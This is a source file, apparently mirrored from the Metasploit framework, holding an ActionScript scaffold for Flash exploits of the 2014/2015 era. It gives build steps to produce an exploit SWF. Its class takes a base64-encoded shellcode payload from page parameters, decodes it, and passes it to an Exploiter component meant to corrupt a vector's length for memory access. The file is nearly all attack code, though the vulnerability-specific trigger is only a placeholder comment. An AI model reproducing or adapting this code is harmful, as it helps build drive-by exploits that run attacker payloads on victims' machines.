Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/external/source/flash_exploiter/Exploit.as
Views: 11766
/*
Code to assist the creation of exploits for the trend of Flash vulnerabilities used in the wild along 2014/2015.
It uses some ideas and code included on @hdarwin89 proof of concepts.
* How to build:
1. Download the AIRSDK, and use its compiler.
2. Download the Flex SDK (4.6)
3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
(all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
4. Build with: mxmlc -o msf.swf Exploit.as
*/
package
{
import flash.display.Sprite
import flash.display.LoaderInfo
import mx.utils.Base64Decoder
import flash.utils.ByteArray
public class Exploit extends Sprite
{
private var uv:Vector.<uint>
private var b64:Base64Decoder = new Base64Decoder()
private var payload:ByteArray
private var platform:String
private var exploiter:Exploiter
public function Exploit()
{
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
b64.decode(b64_payload)
payload = b64.toByteArray()
/*
The exploit code here. The goal is to corrupt the uv vector length with 0x3fffffff or bigger.
*/
exploiter = new Exploiter(this, platform, payload, uv, 0x13e)
}
}
}